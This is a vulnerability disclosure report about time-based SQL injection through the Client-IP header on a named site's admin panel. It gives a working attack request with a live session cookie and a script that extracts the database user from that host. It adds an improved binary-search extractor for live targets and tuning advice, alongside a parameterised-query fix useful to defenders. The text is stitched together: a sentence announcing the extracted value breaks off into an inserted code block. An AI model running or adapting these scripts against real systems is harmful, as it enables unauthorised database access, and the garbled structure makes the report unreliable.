2015-05-04: Details sent to the vendor, awaiting the vendor's response. 2015-05-09: The vendor chose to ignore the vulnerability; details disclosed to the public.
http://yingxiao.aibang.com/
The admin backend's HTTP request headers are vulnerable to time-based (delay) SQL injection:

GET /admin/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: aa'XOR(if(length(user())=19,sleep(5),0))OR'bb
X-Requested-With: XMLHttpRequest
Referer: http://yingxiao.aibang.com/
Cookie: PMID=39; PHPSESSID=07580b841bffb98e0787273c2c40d1c5
Host: yingxiao.aibang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
Content-Length: 6
The Client-IP field in the HTTP headers is the problematic one: its value is placed into a MySQL query unescaped, so a conditional sleep() in the header turns the response time into a yes/no oracle.
The response delays when length(user())=19, so user() is 19 characters long.
Guessing one character at a time gives user() as:
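The report does not include the backend code, so the following is an added illustration, not code from the site: a guessed sink of the same shape (a proxy header like Client-IP or X-Forwarded-For preferred over the socket address and concatenated into SQL) next to a hardened version. SQLite stands in for MySQL only so the example runs offline, and the table, rows and trusted-proxy list are constructed assumptions.

```python
import ipaddress
import sqlite3

# Assumed: the only peers allowed to set a client-IP header are our own proxies.
TRUSTED_PROXIES = {"127.0.0.1"}


def make_db():
    """Constructed in-memory table standing in for whatever the backend keys on
    client_ip. SQLite is used only so the example runs offline; the target is MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_sessions (id INTEGER PRIMARY KEY, client_ip TEXT, user TEXT)")
    conn.executemany("INSERT INTO admin_sessions (client_ip, user) VALUES (?, ?)",
                     [("10.0.0.5", "alice"), ("10.0.0.9", "bob")])
    return conn


def raw_client_ip(headers, remote_addr):
    # The usual pattern behind this bug class: prefer a proxy header over the socket
    # address. Client-IP / X-Forwarded-For are written by the client, so the value is
    # attacker-controlled text, not an IP address.
    return headers.get("Client-IP") or headers.get("X-Forwarded-For") or remote_addr


def sessions_vulnerable(conn, headers, remote_addr):
    ip = raw_client_ip(headers, remote_addr)
    # String-built SQL: a quote in the header value ends the literal and the rest is SQL.
    sql = "SELECT user FROM admin_sessions WHERE client_ip = '%s' ORDER BY id" % ip
    return [row[0] for row in conn.execute(sql)]


def trusted_client_ip(headers, remote_addr):
    """Accept a header value only from a trusted proxy, and only if it parses as an
    IP address (first hop of a comma-separated X-Forwarded-For chain); otherwise use
    the socket peer address."""
    if remote_addr not in TRUSTED_PROXIES:
        return remote_addr
    raw = headers.get("Client-IP") or headers.get("X-Forwarded-For") or ""
    try:
        return str(ipaddress.ip_address(raw.split(",")[0].strip()))
    except ValueError:
        return remote_addr


def sessions_hardened(conn, headers, remote_addr):
    ip = trusted_client_ip(headers, remote_addr)
    # Parameterised query: the value is bound as data and cannot alter the statement.
    return [row[0] for row in conn.execute(
        "SELECT user FROM admin_sessions WHERE client_ip = ? ORDER BY id", (ip,))]


if __name__ == "__main__":
    db = make_db()
    injected = {"Client-IP": "x' OR '1'='1"}
    print("vulnerable:", sessions_vulnerable(db, injected, "127.0.0.1"))
    print("hardened:  ", sessions_hardened(db, injected, "127.0.0.1"))
```

Parameterisation alone is what stops the injection; the header validation is a separate point, since even a correctly escaped Client-IP is still a client-chosen value and must not be used for access decisions unless it came from a proxy you control.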
[email protected]
Script attached:

#encoding=utf-8
import http.client

# Session cookies of the logged-in admin session used for the request above.
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': 'PMID=39; PHPSESSID=07580b841bffb98e0787273c2c40d1c5',
}
# Character set to try at each position.
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'

print('Start to retrieve MySQL User:')
user = ''
for i in range(1, 20):                       # user() is 19 characters long (see above)
    for payload in payloads:
        try:
            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            s = "aa'XOR(if(%s,sleep(60),0))OR'bb" % s
            headers["Client-IP"] = s
            # The timeout equals the sleep, so a correct guess surfaces as a timeout exception.
            conn = http.client.HTTPConnection('yingxiao.aibang.com', timeout=60)
            conn.request(method='GET', url='/admin/', headers=headers)
            conn.getresponse()
            conn.close()
            print('.', end='', flush=True)
        except Exception:
            user += payload
            print('\n[in progress]', user)
            break
print('\n[Done] MySQL user is %s' % user)
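The attached script walks the 39-character alphabet linearly at every position (up to 39 requests per character) and relies on a 60-second sleep colliding with a 60-second socket timeout. As an added example, not part of the original report, the following generalises the same oracle into a binary search over the ASCII range (at most 7 requests per character) and measures round-trip time against a smaller sleep instead of waiting for a timeout. The HTTP transport keeps the report's Client-IP payload shape; host, path and headers passed to it are whatever the target needs. The simulated oracle and the user() string "demo_user@localhost" are constructed so the extractor can be run offline.

```python
import re
import time
import http.client


def make_payload(condition, delay=5):
    """Same payload shape as the report: close the quote, XOR in a conditional
    sleep(), re-open a quote so the statement stays well-formed."""
    return "aa'XOR(if(%s,sleep(%d),0))OR'bb" % (condition, delay)


def http_timing_oracle(host, path, base_headers, delay=5):
    """Yes/no oracle over a live target: one request per question, answered by
    round-trip time rather than by a timeout (assumed host/path/headers)."""
    def oracle(condition):
        h = dict(base_headers, **{"Client-IP": make_payload(condition, delay)})
        conn = http.client.HTTPConnection(host, timeout=delay * 3)
        start = time.monotonic()
        try:
            conn.request("GET", path, headers=h)
            conn.getresponse().read()
        except OSError:            # socket.timeout is an OSError: count as "slept"
            return True
        finally:
            conn.close()
        return time.monotonic() - start >= delay
    return oracle


def simulated_oracle(secret):
    """Constructed stand-in for the vulnerable server: evaluates the two condition
    shapes the extractor emits against a made-up user() string, mimicking MySQL's
    ascii(mid(...)) = 0 past the end of the string."""
    len_re = re.compile(r"^length\(user\(\)\)([<>=])(\d+)$")
    chr_re = re.compile(r"^ascii\(mid\(lower\(user\(\)\),(\d+),1\)\)([<>=])(\d+)$")

    def oracle(condition):
        m = len_re.match(condition)
        if m:
            lhs, op, rhs = len(secret), m.group(1), int(m.group(2))
        else:
            m = chr_re.match(condition)
            if not m:
                raise ValueError("unsupported condition: " + condition)
            pos, op, rhs = int(m.group(1)), m.group(2), int(m.group(3))
            lhs = ord(secret.lower()[pos - 1]) if pos <= len(secret) else 0
        return {"<": lhs < rhs, ">": lhs > rhs, "=": lhs == rhs}[op]
    return oracle


class CountingOracle:
    """Wraps an oracle and counts questions, to compare against the linear scan."""
    def __init__(self, oracle):
        self.oracle, self.calls = oracle, 0

    def __call__(self, condition):
        self.calls += 1
        return self.oracle(condition)


def bsearch(oracle, fmt, lo, hi):
    """Find the value in [lo, hi] using only 'value > mid' questions:
    ceil(log2(hi - lo + 1)) requests instead of one per candidate."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(fmt % mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_length(oracle, max_len=64):
    return bsearch(oracle, "length(user())>%d", 0, max_len)


def find_char(oracle, pos):
    # Printable ASCII range; lower() on the server side halves the letter space.
    return chr(bsearch(oracle, "ascii(mid(lower(user()),%d,1))>%%d" % pos, 32, 126))


def extract_user(oracle):
    n = find_length(oracle)
    return "".join(find_char(oracle, i) for i in range(1, n + 1))


if __name__ == "__main__":
    # Offline run; swap in http_timing_oracle(host, "/admin/", headers) for a live target.
    counted = CountingOracle(simulated_oracle("demo_user@localhost"))
    print(extract_user(counted), "in", counted.calls, "requests")
```

For a 19-character value the linear scan needs up to 741 requests, the binary search at most 140. Against a real target the delay should be large enough to stand out from normal latency jitter but small enough that false positives from a slow response are caught; repeating a positive answer once before accepting it is the usual safeguard.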
Severity: no impact (vendor ignored)
Ignored on: 2015-05-09 11:06
Vulnerability Rank: 4 (WooYun rating)
Vendor response: none